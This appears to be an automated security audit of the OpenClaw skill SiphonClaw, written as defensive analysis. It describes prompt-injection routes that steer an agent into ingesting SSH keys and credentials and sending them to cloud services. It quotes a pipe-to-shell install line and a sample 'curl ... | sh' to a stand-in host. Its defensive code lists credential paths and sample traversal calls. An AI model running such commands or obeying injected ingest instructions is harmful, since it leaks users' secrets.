Is curtisgc1/siphonclaw safe?
https://github.com/openclaw/skills/tree/main/skills/curtisgc1/siphonclaw
SiphonClaw presents a clean install profile — no prompt injection in SKILL.md, no malicious code, no canary file exfiltration, and standard network behavior during installation. However, its core MCP tool architecture creates a significant latent data exfiltration risk: siphonclaw_ingest and siphonclaw_identify accept arbitrary absolute filesystem paths with no access controls, routing file contents through external cloud APIs (OpenRouter, MiniMax M2.5, Kimi K2.5), with additional external channels via Telegram bot and email integration. An agent manipulated into ingesting sensitive files would silently transmit their contents to third-party servers, requiring no modification to the skill itself. The skill's utility is genuine, but users should understand they are granting the agent the ability to read any local file and send its contents externally.
Category Scores
Findings (10)
CRITICAL Unrestricted Absolute Path Ingestion Routed to External Cloud APIs -40
The siphonclaw_ingest and siphonclaw_identify MCP tools accept arbitrary absolute filesystem paths with no documented access controls, path sandboxing, or allowlist. Any file readable by the agent process — including .env files, SSH private keys, AWS credentials, and API key files — can be ingested into the knowledge base. In Mode B (Full Cloud), file content is transmitted directly to OpenRouter, MiniMax M2.5, and Kimi K2.5 during ingestion. In Mode A (Hybrid), text excerpts from indexed files are transmitted to cloud LLMs at query time. This creates a direct, low-friction pathway from local sensitive files to third-party cloud providers.
HIGH Skill Architecture Functions as a Complete Data Exfiltration Pipeline When Misused -45
The skill's core design — read arbitrary local files via absolute paths, process through external cloud LLMs, store in a queryable vector database, expose via Telegram/email/CLI — constitutes a functional end-to-end exfiltration system when an agent is manipulated into ingesting sensitive files. No prompt injection in SKILL.md is required; an attacker who can influence any content the agent encounters can direct siphonclaw_ingest calls. The architecture requires no modification to become a data collection tool.
HIGH Persistent Knowledge Base Creates Durable Exfiltration Store Accessible via External Channels -17
The siphonclaw_field_note tool and the learning loop mechanism persistently index captured data with no expiry, making it permanently retrievable via subsequent queries. Telegram bot and AgentMail integrations provide external access to this knowledge base that is not under the user's direct control once API keys are configured. If an agent is manipulated into ingesting sensitive data in one session, that data persists and can be accessed externally in future sessions.
HIGH Multiple External Communication Channels Expand Exfiltration Surface -15
Beyond the primary OpenRouter/MiniMax/Kimi cloud APIs, the skill integrates three additional external communication channels: Telegram bot (queries and responses via Telegram's servers), AgentMail email pipeline (asynchronous query access via email), and Brave Search API (query terms transmitted on every web-search fallback). Each channel represents an additional endpoint to which data can flow and an additional credential that, if compromised, grants access to the knowledge base.
MEDIUM Absolute Path Parameters Create Second-Order Injection Surface -15
Although SKILL.md itself contains no prompt injection, the file_path and image_path parameters in siphonclaw_ingest and siphonclaw_identify are natural targets for second-order injection. A malicious document ingested into the knowledge base, a manipulated web search result, or another compromised skill could instruct the agent to call siphonclaw_ingest with a path to sensitive files — bypassing the need for direct prompt injection in SKILL.md.
MEDIUM Setup Instructions Include Unverified Remote Script Execution -12
The README setup instructions include 'curl -fsSL https://ollama.com/install.sh | sh', the familiar pattern of piping a remote script straight into a shell with no checksum or signature check on what was fetched. Ollama is a legitimate project, but the pattern gives the reader nothing to verify: a fork of the skill that swaps in a lookalike URL would read identically in the docs, and whatever the URL serves at that moment runs as the user. This command was not executed during install monitoring, which only cloned the skill directory; the risk applies to users who follow the documented setup path.
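As an added example (not from the SiphonClaw README or the Ollama project), the fetch, verify, then execute sequence that replaces the pipe-to-shell line, written in Python so the check can be exercised offline. The expected digest must come from a channel independent of the download (a checksum the project publishes, or a value you pin after reading the script yourself); SAMPLE_SCRIPT and SAMPLE_SHA256 below are constructed stand-ins, not Ollama's installer or its real digest.

```python
"""Verify-before-execute replacement for `curl -fsSL <url> | sh`.

Added example; nothing here is the skill's or Ollama's code. The sample
script and digest at the bottom are constructed for an offline check.
"""
import hashlib
import hmac
import os
import stat
import subprocess
import tempfile
import urllib.request


class InstallerRejected(RuntimeError):
    """Digest mismatch: the bytes fetched are not the bytes that were reviewed."""


def fetch(url: str) -> bytes:
    """Download the whole script into memory; nothing is executed here."""
    with urllib.request.urlopen(url, timeout=60) as resp:
        return resp.read()


def verify_installer(payload: bytes, expected_sha256: str) -> str:
    """Return the hex SHA-256 of payload if it matches the pinned value, else raise."""
    digest = hashlib.sha256(payload).hexdigest()
    if not hmac.compare_digest(digest, expected_sha256.strip().lower()):
        raise InstallerRejected(f"sha256 {digest} does not match pinned {expected_sha256}")
    return digest


def is_trusted(payload: bytes, expected_sha256: str) -> bool:
    """Boolean form of verify_installer for callers that do not want the exception."""
    try:
        verify_installer(payload, expected_sha256)
        return True
    except InstallerRejected:
        return False


def stage_installer(payload: bytes, expected_sha256: str, directory=None) -> str:
    """Write verified bytes to a private, user-executable temp file and return its path.

    Staging to disk after verification means the bytes that were hashed are the
    bytes that run; a pipe gives the shell whatever the server sent, unreviewed.
    """
    verify_installer(payload, expected_sha256)
    fd, path = tempfile.mkstemp(prefix="installer-", suffix=".sh", dir=directory)
    with os.fdopen(fd, "wb") as fh:
        fh.write(payload)
    os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
    return path


def install(url: str, expected_sha256: str) -> int:
    """Fetch, verify, run, clean up. Raises InstallerRejected before anything executes."""
    path = stage_installer(fetch(url), expected_sha256)
    try:
        return subprocess.run(["sh", path], check=True).returncode
    finally:
        os.unlink(path)


# Constructed for the offline check. In real use, replace with the installer URL
# and a digest taken from a source that is not the download itself.
SAMPLE_SCRIPT = b"#!/bin/sh\necho 'installing'\n"
SAMPLE_SHA256 = hashlib.sha256(SAMPLE_SCRIPT).hexdigest()

if __name__ == "__main__":
    tampered = SAMPLE_SCRIPT + b"curl http://example.invalid/x | sh\n"
    print("pristine trusted:", is_trusted(SAMPLE_SCRIPT, SAMPLE_SHA256))
    print("tampered trusted:", is_trusted(tampered, SAMPLE_SHA256))
```

The comparison uses hmac.compare_digest so a mismatch does not leak through timing, and the staged file is created with mkstemp so a concurrent local user cannot pre-create or swap it between the hash check and execution.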
MEDIUM Combination Attack Risk with Web-Fetch or File-Browse Skills -10
When co-installed with any skill that fetches web pages or lists filesystem directories, SiphonClaw becomes a two-stage attack platform: stage one discovers sensitive file paths or receives attacker-controlled ingestion instructions via fetched content, stage two ingests those files via siphonclaw_ingest. The skill is designed to be composable with other MCP tools, which amplifies its risk in a multi-skill environment.
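The control that the CRITICAL finding above says siphonclaw_ingest and siphonclaw_identify lack, as an added example that is not SiphonClaw's own code. check_ingest_path() is what an MCP server would run on the file_path / image_path argument before opening anything; triage_tool_calls() applies the same policy to recorded tool calls, which is how the second-order injection and two-stage scenarios above would show up in an agent transcript. The allowed roots, deny lists, argument key names and the sample calls are all assumptions constructed for this example, not values taken from the skill.

```python
"""Path policy for a file-ingesting MCP tool (added example, not the skill's code).

Assumed for the example: ALLOWED_ROOTS, DENY_DIRS, DENY_GLOBS, the argument
key per tool in INGEST_TOOLS, and the SAMPLE_CALLS transcript.
"""
from __future__ import annotations

import fnmatch
import os
from pathlib import PurePosixPath

# Assumption: the only directories the operator wants the agent to read from.
ALLOWED_ROOTS = ("/srv/kb/inbox", "/opt/kb/docs")

# Directories that hold credentials by convention; refused even when an
# allowed root (or a symlink planted inside one) would otherwise reach them.
DENY_DIRS = {".ssh", ".aws", ".gnupg", ".kube", ".docker"}

# Basename patterns for the secret types the finding names.
DENY_GLOBS = (".env", ".env.*", "*.env", "id_rsa*", "id_ed25519*", "id_ecdsa*",
              "*.pem", "*.key", "*.p12", "*.pfx", "credentials", ".netrc", ".npmrc")

# Assumption: which argument carries the path for each tool.
INGEST_TOOLS = {"siphonclaw_ingest": "file_path", "siphonclaw_identify": "image_path"}


class IngestRefused(ValueError):
    """Policy violation; the tool returns this message to the model, not the file."""


def check_ingest_path(requested, roots=ALLOWED_ROOTS) -> str:
    """Return the canonical path to read, or raise IngestRefused.

    Order matters: canonicalise first (symlinks, '..', doubled slashes), then
    test containment, then the deny lists, so a symlink inside an allowed root
    that points at ~/.ssh/id_rsa is judged by its target, not its name.
    """
    if not isinstance(requested, str) or not os.path.isabs(requested):
        raise IngestRefused(f"absolute path required, got {requested!r}")
    real = os.path.realpath(requested)            # resolves the components that exist
    real_roots = [os.path.realpath(r) for r in roots]
    if not any(os.path.commonpath([r, real]) == r for r in real_roots):
        raise IngestRefused(f"outside allowed roots: {real}")
    parts = PurePosixPath(real).parts
    crossed = DENY_DIRS.intersection(parts[:-1])
    if crossed:
        raise IngestRefused(f"crosses protected directory {sorted(crossed)[0]!r}: {real}")
    for pattern in DENY_GLOBS:
        if fnmatch.fnmatchcase(parts[-1], pattern):
            raise IngestRefused(f"basename matches deny pattern {pattern!r}: {real}")
    return real


def triage_tool_calls(calls):
    """One (call id, verdict, detail) tuple per call; non-ingest tools are ignored.

    Usable as a pre-execution gate in the server or as a detection pass over a
    saved transcript of the agent's tool calls.
    """
    verdicts = []
    for call in calls:
        key = INGEST_TOOLS.get(call["tool"])
        if key is None:
            verdicts.append((call["id"], "ignore", None))
            continue
        try:
            verdicts.append((call["id"], "allow", check_ingest_path(call["args"].get(key))))
        except IngestRefused as err:
            verdicts.append((call["id"], "refuse", str(err)))
    return verdicts


# Constructed transcript: one legitimate ingest, then the calls a fetched page
# or a poisoned document could steer the agent into making.
SAMPLE_CALLS = [
    {"id": 1, "tool": "siphonclaw_ingest",   "args": {"file_path": "/srv/kb/inbox/q3-report.pdf"}},
    {"id": 2, "tool": "siphonclaw_ingest",   "args": {"file_path": "/srv/kb/inbox/../../../etc/passwd"}},
    {"id": 3, "tool": "siphonclaw_identify", "args": {"image_path": "/home/dev/.ssh/id_rsa"}},
    {"id": 4, "tool": "siphonclaw_ingest",   "args": {"file_path": "/srv/kb/inbox/.env"}},
    {"id": 5, "tool": "siphonclaw_ingest",   "args": {"file_path": "/srv/kb/inbox/.aws/credentials"}},
    {"id": 6, "tool": "siphonclaw_ingest",   "args": {"file_path": "notes/todo.md"}},
    {"id": 7, "tool": "siphonclaw_query",    "args": {"q": "summarise the Q3 report"}},
]

if __name__ == "__main__":
    for call_id, verdict, detail in triage_tool_calls(SAMPLE_CALLS):
        print(call_id, verdict, detail)
```

Call 2 is refused because the path is canonicalised before the containment test, so the '..' traversal resolves to /etc/passwd and falls outside every root; call 5 is inside a root but crosses .aws, which is why the deny-directory check runs on the resolved path rather than on the string the model supplied. Note that this guard only limits which files can be read; it does nothing about where the contents go afterwards (Mode B still sends them to the cloud providers), so it should sit alongside, not replace, a decision about which ingest mode to run.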
LOW Skill Name Semantically Aligned with Data Exfiltration -10
The name 'SiphonClaw' reads as a description of covert data extraction: 'siphon' means to draw off or drain, 'claw' means to seize or grab. The 'claw' half is weak evidence on its own, since the skill is published in the openclaw/skills repository and follows the platform's naming; 'siphon' is the part that matches the behavior. This could be ordinary branding for a document intelligence tool, but taken together with an architecture that reads arbitrary local files and routes their contents to external servers it is a pattern worth noting. The 'siphonclaw_' prefix appears in every MCP tool name.
INFO Install Behavior Is Clean — No Malicious Activity Detected During Installation 0
The git sparse-checkout install produced only expected network connections to GitHub (140.82.121.3:443). No unexpected process spawning, no novel outbound connections, no filesystem changes outside the skill directory, and no canary file exfiltration occurred during the installation window. The skill files themselves (SKILL.md, README.md, _meta.json) are documentation only.
INFO Canary File Accesses Attributed to Monitoring Infrastructure, Not Skill 0
Sensitive file accesses visible in inotify and auditd logs (at timestamps 1771936331.303-304 and 1771936355.570) occurred before and after the git clone respectively, consistent with monitoring system pre-install baseline capture and post-install integrity verification. The git clone command was not issued until timestamp 1771936336.809. No skill-initiated process accessed the canary files.